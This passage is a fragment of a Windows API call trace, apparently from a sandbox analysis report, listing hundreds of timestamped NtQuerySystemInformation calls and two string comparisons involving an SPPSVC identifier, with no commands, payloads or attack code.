SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec80, Length=0x28, ResultLength=0x0) [0240.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0240.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0240.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0240.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec80, Length=0x28, ResultLength=0x0) [0240.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0240.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0240.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0240.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0240.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0240.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0240.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0240.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee58, Length=0x30, ResultLength=0x0) [0240.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x38, ResultLength=0x0) [0240.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0240.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0240.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0240.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0240.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0240.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0240.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0240.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0240.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0240.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0240.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0240.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e840, Length=0x28, ResultLength=0x0) [0240.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0240.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0240.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e820, Length=0x20, ResultLength=0x0) [0240.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7b0, Length=0x20, ResultLength=0x0) [0240.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7b0, Length=0x20, ResultLength=0x0) [0240.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0240.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0240.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0240.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0240.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0240.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee58, Length=0x30, ResultLength=0x0) [0240.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x38, ResultLength=0x0) [0240.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebb0, Length=0x28, ResultLength=0x0) [0240.363] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0240.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0240.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0240.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0240.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x28, ResultLength=0x0) [0240.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0240.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0240.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0240.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0240.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0240.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0240.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0240.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0240.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0240.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebb0, Length=0x28, ResultLength=0x0) [0240.373] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0240.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0240.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0240.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, 